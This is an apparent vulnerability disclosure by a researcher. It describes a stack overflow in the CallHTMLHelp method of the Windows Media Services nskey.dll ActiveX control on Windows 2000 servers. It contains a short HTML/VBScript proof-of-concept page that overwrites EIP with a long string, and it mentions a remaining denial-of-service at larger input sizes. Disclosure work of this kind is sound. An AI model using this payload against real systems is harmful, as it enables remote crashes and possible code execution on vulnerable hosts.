Windows Media Services (nskey.dll) on Windows 2000 Server, Advanced Server, and Datacenter Edition all suffer from a stack overflow vulnerability. Using an Active-X control that is safe for scripting/initialize, passing at least 9752 bytes to CallHTMLHelp will overwrite the EIP and remote code execution may be possible.
7dd68791afc2235b0b12444e2fd32dbc8395c768e03a777ceda41ac3bed58fe0
Product: Windows Media Services (nskey.dll)
Products affected/tested: Windows 2000 Server
Windows 2000 Advanced Server
Windows 2000 Datacenter Edition
Attack: Stack Overflow
Technical Details:
Via an activex control that is safe for scripting/initilize, passing atleast 9752 bytes
to CallHTMLHelp will overwrite the EIP and remote code execution may be possible.
PoC exploit:
<html><body>
<object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object>
<script language=vbscript>
arg1=String(9752, "A")
target.CallHTMLHelp arg1
</script>
</body></html>
This PoC should work fine and overwrite the EIP, hitting 0x41414141 of course. Now for the
part for why I released this information...
Apprently this issue has been very silently fixed (I cannot find ANY information ANYWHERE for or relating to it) by Microsoft a few patches ago.
And.. WINDOWS 2000 IS OLD. Widely used, but still pretty old for a modern operating system.
This bug was pretty exploitable until I used Windows Up2date :(
But, to no surprise, they didn't fix the bug completely. Theres still a DoS after putting
about 525,000 bytes in the buffer. Oh well :)
Jeremy Brown (0xjbrown41@gmail.com)